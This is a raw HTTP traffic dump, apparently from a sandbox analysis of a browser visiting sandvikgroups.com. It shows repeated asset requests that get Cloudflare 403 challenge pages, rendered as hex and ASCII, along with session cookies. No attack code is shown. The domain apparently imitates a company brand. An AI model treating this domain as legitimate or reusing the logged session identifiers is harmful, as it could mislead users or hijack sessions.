                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
                                        2025-01-07 21:06:26 UTC758INHTTP/1.1 405 Method Not Allowed
                                        Date: Tue, 07 Jan 2025 21:06:26 GMT
                                        Content-Length: 0
                                        Connection: close
                                        allow: POST
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gNqnLOkfvVqZ2bF%2BZQN0XV5r7YBwDEILg8GKKHoyIGFwNEhBoZwK7rzRC1pVZ%2BOtlofB175kFZ%2FOKYnPdhOCRAtpVicEJ1118V%2BS7VksH5T1%2FwX%2B%2BgzAO%2FZjvs1iiO4W17rL3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e960da6642d5-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1865&min_rtt=1853&rtt_var=720&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1412&delivery_rate=1493606&cwnd=221&unsent_bytes=0&cid=89d0f5dc88101411&ts=156&x=0"


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        49192.168.2.449821188.114.97.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:26 UTC819OUTGET /?get_link=ch_files/pics/white_logo.svg HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
                                        2025-01-07 21:06:26 UTC1285INHTTP/1.1 403 Forbidden
                                        Date: Tue, 07 Jan 2025 21:06:26 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Resource-Policy: same-origin
                                        Origin-Agent-Cluster: ?1
                                        Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                        Referrer-Policy: same-origin
                                        X-Content-Options: nosniff
                                        X-Frame-Options: SAMEORIGIN
                                        cf-mitigated: challenge
                                        2025-01-07 21:06:26 UTC959INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 72 56 32 77 35 43 4c 4c 2b 38 43 4b 71 35 39 43 52 6d 32 6c 71 4f 68 41 41 49 48 71 65 45 48 76 2f 63 74 35 2f 33 36 4f 4d 38 31 6d 5a 57 7a 48 42 31 42 70 6d 79 4d 37 62 41 4d 79 39 55 47 53 69 78 54 67 76 45 6d 48 35 2f 43 61 63 37 63 76 7a 4f 45 38 39 38 4c 42 76 66 36 30 53 33 55 54 6f 35 75 50 67 4b 67 46 55 78 73 55 59 6f 79 6c 79 54 58 39 4e 63 64 70 39 44 4d 64 63 75 50 51 48 32 64 44 66 45 71 33 70 7a 50 4b 42 53 31 43 30 56 56 39 6e 41 3d 3d 24 6f 4c 51 31 63 7a 4c 77 55 46 67 6f 57 72 75 31 69 6c 7a 48 65 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                        Data Ascii: cf-chl-out: rV2w5CLL+8CKq59CRm2lqOhAAIHqeEHv/ct5/36OM81mZWzHB1BpmyM7bAMy9UGSixTgvEmH5/Cac7cvzOE898LBvf60S3UTo5uPgKgFUxsUYoylyTX9Ncdp9DMdcuPQH2dDfEq3pzPKBS1C0VV9nA==$oLQ1czLwUFgoWru1ilzHew==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                        2025-01-07 21:06:26 UTC1369INData Raw: 32 32 36 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                        Data Ascii: 2261<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                        2025-01-07 21:06:26 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                        Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                        2025-01-07 21:06:26 UTC1369INData Raw: 36 2d 31 2e 32 2e 31 2e 31 2d 65 4d 32 48 52 7a 73 76 7a 6e 36 72 37 63 75 65 37 57 76 73 6a 78 73 51 47 4c 4e 34 55 6a 31 30 67 4a 33 65 52 77 77 50 79 35 6d 33 4c 54 49 50 76 6b 78 75 59 52 53 39 41 48 42 51 59 69 65 43 50 45 72 42 39 52 55 51 45 75 4e 5a 74 63 4f 74 53 37 79 72 5f 44 6c 77 41 33 33 55 36 35 57 38 58 78 38 50 50 47 61 69 70 39 4e 6b 48 50 71 33 4c 53 56 41 57 58 72 41 65 79 54 46 34 4e 6e 36 46 49 32 70 71 39 57 38 75 36 4b 66 34 7a 55 32 78 6e 33 6c 69 63 48 74 30 6c 38 5f 5a 34 75 55 69 69 53 41 66 4b 47 71 6d 78 75 2e 6e 41 33 64 77 67 75 5f 66 44 6c 41 4e 47 43 6e 36 6d 61 71 51 69 72 39 71 49 6d 37 4e 75 35 37 45 5f 6e 6d 33 6b 67 79 66 69 42 79 42 48 68 6d 68 50 30 51 68 6e 71 41 62 63 38 50 34 64 52 6b 66 6b 45 41 71 6c 4d 75 64
                                        Data Ascii: 6-1.2.1.1-eM2HRzsvzn6r7cue7WvsjxsQGLN4Uj10gJ3eRwwPy5m3LTIPvkxuYRS9AHBQYieCPErB9RUQEuNZtcOtS7yr_DlwA33U65W8Xx8PPGaip9NkHPq3LSVAWXrAeyTF4Nn6FI2pq9W8u6Kf4zU2xn3licHt0l8_Z4uUiiSAfKGqmxu.nA3dwgu_fDlANGCn6maqQir9qIm7Nu57E_nm3kgyfiByBHhmhP0QhnqAbc8P4dRkfkEAqlMud
                                        2025-01-07 21:06:26 UTC1369INData Raw: 56 4d 6d 50 71 4b 73 69 66 47 43 42 45 72 6f 79 50 4f 67 78 47 31 59 34 33 72 77 47 45 75 5a 47 4f 6d 74 58 4d 79 65 37 74 4b 51 30 6b 56 57 42 6b 5a 45 39 5a 4f 47 2e 6b 48 5f 66 73 4b 36 37 61 4b 67 77 44 50 70 4a 47 51 43 57 76 67 73 4a 4f 71 64 69 76 75 79 6a 31 4b 59 34 33 50 32 6e 38 43 55 51 6d 47 76 43 38 41 4a 67 67 5f 31 74 4c 43 6f 7a 67 64 53 58 5a 4a 78 75 73 6a 44 39 33 64 6d 52 52 44 6d 44 55 7a 6e 55 41 71 4a 57 58 76 43 46 63 64 51 63 35 39 4e 32 43 63 45 7a 63 47 69 49 59 53 45 30 6d 49 53 6a 4e 65 38 74 63 5a 70 76 33 46 4f 77 2e 55 41 52 76 79 75 4d 45 67 38 46 7a 50 43 30 6e 65 39 31 30 48 53 52 2e 46 36 4a 44 4e 73 5a 72 4f 7a 66 59 30 32 41 7a 58 37 38 37 43 5f 73 4c 69 56 5f 4e 32 58 74 4e 67 5a 79 72 30 61 48 51 35 47 6d 76 50 50
                                        Data Ascii: VMmPqKsifGCBEroyPOgxG1Y43rwGEuZGOmtXMye7tKQ0kVWBkZE9ZOG.kH_fsK67aKgwDPpJGQCWvgsJOqdivuyj1KY43P2n8CUQmGvC8AJgg_1tLCozgdSXZJxusjD93dmRRDmDUznUAqJWXvCFcdQc59N2CcEzcGiIYSE0mISjNe8tcZpv3FOw.UARvyuMEg8FzPC0ne910HSR.F6JDNsZrOzfY02AzX787C_sLiV_N2XtNgZyr0aHQ5GmvPP
                                        2025-01-07 21:06:26 UTC1369INData Raw: 50 72 4d 49 4d 62 4b 6a 78 74 34 68 42 55 32 52 47 59 62 59 5f 34 32 46 72 64 53 42 42 31 48 6f 30 74 65 48 43 39 66 78 69 59 6c 33 6f 4e 63 36 42 47 6e 50 33 6d 33 59 31 42 2e 71 55 45 33 50 39 72 70 39 77 57 5a 6e 30 65 49 79 34 46 6c 45 66 4c 39 62 76 66 62 47 32 69 65 50 32 59 50 7a 38 51 6f 69 65 4a 6e 74 34 70 31 52 4e 44 2e 65 4c 67 5f 5a 46 79 32 49 2e 6e 6c 30 75 73 75 5a 39 70 47 7a 47 2e 6c 67 61 38 5a 43 5a 30 69 49 74 38 75 41 42 32 53 37 38 42 56 41 4a 33 32 47 45 76 53 78 4c 4d 6b 59 6a 4f 78 6a 42 65 41 67 4a 53 33 36 46 76 47 56 33 35 44 50 6f 72 39 77 52 32 48 30 78 5a 5f 67 46 5f 50 48 4f 61 42 36 49 69 52 47 73 47 74 67 52 50 32 4e 49 2e 63 73 32 73 4b 48 43 33 4c 61 58 7a 54 50 75 42 6a 32 56 78 49 55 65 77 4c 48 6c 6f 4d 30 72 76 65
                                        Data Ascii: PrMIMbKjxt4hBU2RGYbY_42FrdSBB1Ho0teHC9fxiYl3oNc6BGnP3m3Y1B.qUE3P9rp9wWZn0eIy4FlEfL9bvfbG2ieP2YPz8QoieJnt4p1RND.eLg_ZFy2I.nl0usuZ9pGzG.lga8ZCZ0iIt8uAB2S78BVAJ32GEvSxLMkYjOxjBeAgJS36FvGV35DPor9wR2H0xZ_gF_PHOaB6IiRGsGtgRP2NI.cs2sKHC3LaXzTPuBj2VxIUewLHloM0rve
                                        2025-01-07 21:06:26 UTC1369INData Raw: 36 41 65 75 54 6a 4d 55 5f 59 43 67 63 66 71 4c 6c 56 31 6c 47 53 6b 49 77 64 63 53 6b 37 42 5f 62 75 72 73 71 68 48 43 73 6c 65 52 5a 49 58 33 47 51 65 51 77 6c 2e 58 2e 74 4e 6f 31 37 36 6b 59 4f 32 6d 66 43 74 33 38 47 63 78 65 52 39 74 66 6e 39 71 59 63 47 45 57 62 77 45 42 35 50 46 4c 43 52 79 67 33 58 4c 59 37 4c 73 52 36 50 6d 58 63 77 45 55 50 49 76 63 55 6c 62 6c 6d 63 5f 57 5f 74 58 6c 5f 65 58 4a 7a 4a 70 5a 77 41 6b 67 36 58 37 48 66 41 53 6a 54 72 57 38 43 4b 45 32 49 46 30 62 42 58 76 31 73 48 55 36 51 4e 72 77 61 68 31 39 50 31 46 6c 78 78 4d 6d 57 32 38 58 52 4c 4d 74 6c 74 45 6f 6f 6f 47 69 70 71 4f 6f 78 61 39 77 39 77 52 70 76 6b 74 5f 76 69 68 4d 69 57 51 79 71 39 72 34 76 44 6e 33 44 67 6a 43 6d 6f 76 2e 78 49 37 50 48 45 6d 51 42 6b
                                        Data Ascii: 6AeuTjMU_YCgcfqLlV1lGSkIwdcSk7B_bursqhHCsleRZIX3GQeQwl.X.tNo176kYO2mfCt38GcxeR9tfn9qYcGEWbwEB5PFLCRyg3XLY7LsR6PmXcwEUPIvcUlblmc_W_tXl_eXJzJpZwAkg6X7HfASjTrW8CKE2IF0bBXv1sHU6QNrwah19P1FlxxMmW28XRLMtltEoooGipqOoxa9w9wRpvkt_vihMiWQyq9r4vDn3DgjCmov.xI7PHEmQBk
                                        2025-01-07 21:06:26 UTC595INData Raw: 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 2e 6c 65 6e 67 74 68 29 2e 69 6e 64 65 78 4f 66 28 27 3f 27 29 20 21 3d 3d 20 2d 31 20 3f 20 27 3f 27 20 3a 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 69 66 20 28 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 20 26 26 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 29 20 7b 76 61 72 20 6f 67 55 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 51 75 65 72 79 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 3b 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 22 5c 2f 3f 67 65 74 5f 6c 69 6e
                                        Data Ascii: _chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null, "\/?get_lin
                                        2025-01-07 21:06:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        50192.168.2.449823188.114.97.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:27 UTC816OUTGET /?get_link=ch_files/pics/1024_bg.jpg HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
                                        2025-01-07 21:06:27 UTC1285INHTTP/1.1 403 Forbidden
                                        Date: Tue, 07 Jan 2025 21:06:27 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Resource-Policy: same-origin
                                        Origin-Agent-Cluster: ?1
                                        Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                        Referrer-Policy: same-origin
                                        X-Content-Options: nosniff
                                        X-Frame-Options: SAMEORIGIN
                                        cf-mitigated: challenge
                                        2025-01-07 21:06:27 UTC955INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 77 52 2f 46 63 49 4a 57 70 59 70 4c 31 4d 74 4e 42 79 6d 4d 6b 36 6e 72 6a 6a 31 74 77 43 37 34 38 2f 45 52 4b 2b 4e 54 5a 47 36 63 31 67 4a 51 78 65 4a 6b 6a 57 4b 41 43 68 6e 30 4a 72 67 78 30 6c 59 61 44 77 65 2b 53 55 44 35 75 4b 52 7a 4c 63 6e 33 54 49 51 58 74 69 50 49 52 52 56 4d 51 68 59 57 66 57 59 48 41 38 42 4a 69 4a 32 49 54 6e 61 5a 35 55 48 70 39 53 46 68 54 6a 66 6a 34 39 35 6e 76 75 70 75 59 4c 4c 76 2b 65 79 33 72 79 33 71 64 67 3d 3d 24 47 4a 49 52 53 44 6b 47 78 30 36 6e 5a 4a 38 36 6e 56 76 58 39 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                        Data Ascii: cf-chl-out: wR/FcIJWpYpL1MtNBymMk6nrjj1twC748/ERK+NTZG6c1gJQxeJkjWKAChn0Jrgx0lYaDwe+SUD5uKRzLcn3TIQXtiPIRRVMQhYWfWYHA8BJiJ2ITnaZ5UHp9SFhTjfj495nvupuYLLv+ey3ry3qdg==$GJIRSDkGx06nZJ86nVvX9Q==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                        2025-01-07 21:06:27 UTC1369INData Raw: 32 32 32 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                        Data Ascii: 222c<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                        2025-01-07 21:06:27 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                        Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                        2025-01-07 21:06:27 UTC1369INData Raw: 31 2e 31 2d 56 31 68 5f 66 57 41 45 2e 36 34 63 72 73 72 2e 48 7a 77 47 75 67 51 6e 39 59 78 4f 38 33 46 62 51 4f 42 37 4b 37 2e 53 78 64 53 6d 43 4a 4f 75 5f 58 4c 6a 6e 78 52 79 4e 62 61 48 31 74 70 47 4c 4b 52 5a 6b 48 33 36 6b 70 64 78 48 67 71 70 39 53 30 58 6e 4c 4f 51 33 53 61 31 54 65 35 4b 38 7a 62 63 4b 64 65 6b 5f 33 6a 38 54 6c 67 4b 65 66 33 37 4c 34 65 44 78 49 32 38 56 50 4c 55 70 6e 70 36 30 47 64 33 7a 38 72 75 59 4a 70 5f 63 71 6f 4a 59 53 63 5f 61 79 32 68 79 63 61 73 7a 79 6e 64 69 50 4d 43 38 57 76 4a 69 32 74 65 77 6d 64 65 66 47 6b 33 30 65 53 42 53 5f 30 69 44 62 70 78 49 51 49 5f 49 38 72 36 57 38 77 50 38 63 4a 6d 51 6e 72 42 67 73 48 36 78 35 58 67 37 74 34 53 6f 35 54 54 47 56 2e 4d 49 57 52 68 41 46 30 36 65 65 41 34 32 4c 49
                                        Data Ascii: 1.1-V1h_fWAE.64crsr.HzwGugQn9YxO83FbQOB7K7.SxdSmCJOu_XLjnxRyNbaH1tpGLKRZkH36kpdxHgqp9S0XnLOQ3Sa1Te5K8zbcKdek_3j8TlgKef37L4eDxI28VPLUpnp60Gd3z8ruYJp_cqoJYSc_ay2hycaszyndiPMC8WvJi2tewmdefGk30eSBS_0iDbpxIQI_I8r6W8wP8cJmQnrBgsH6x5Xg7t4So5TTGV.MIWRhAF06eeA42LI
                                        2025-01-07 21:06:27 UTC1369INData Raw: 6a 4d 2e 46 71 35 57 7a 34 41 73 6f 71 59 2e 74 50 4b 42 39 32 71 5a 65 37 31 6e 36 75 46 6c 64 74 30 4e 78 6e 33 41 4c 4a 51 51 68 6c 54 72 6c 51 72 32 6f 58 6a 6c 77 75 4f 36 6b 63 54 7a 54 33 67 63 50 63 62 44 37 55 6f 63 51 4f 77 68 76 31 48 79 4b 4d 64 5a 70 57 33 55 73 43 77 45 31 4b 53 51 58 68 46 61 63 4f 43 79 67 52 78 2e 41 73 5a 5f 6f 77 43 68 50 53 41 79 59 5f 34 74 74 50 56 31 34 4b 68 77 5f 37 74 6f 5f 71 38 63 48 76 55 6c 4d 64 65 75 6f 48 34 79 2e 41 75 42 4e 46 6d 75 55 6f 64 5f 67 6d 5f 38 67 30 76 50 31 48 69 68 32 46 42 54 48 68 37 33 50 78 57 4a 57 47 55 49 45 64 34 42 41 48 44 4f 45 73 76 41 5a 36 2e 30 75 62 47 77 39 51 6f 56 34 5a 6b 4c 46 66 6a 45 45 4e 68 61 32 6e 6e 34 5a 30 59 47 39 56 6f 62 35 7a 75 6f 4c 73 76 46 41 4b 71 43
                                        Data Ascii: jM.Fq5Wz4AsoqY.tPKB92qZe71n6uFldt0Nxn3ALJQQhlTrlQr2oXjlwuO6kcTzT3gcPcbD7UocQOwhv1HyKMdZpW3UsCwE1KSQXhFacOCygRx.AsZ_owChPSAyY_4ttPV14Khw_7to_q8cHvUlMdeuoH4y.AuBNFmuUod_gm_8g0vP1Hih2FBTHh73PxWJWGUIEd4BAHDOEsvAZ6.0ubGw9QoV4ZkLFfjEENha2nn4Z0YG9Vob5zuoLsvFAKqC
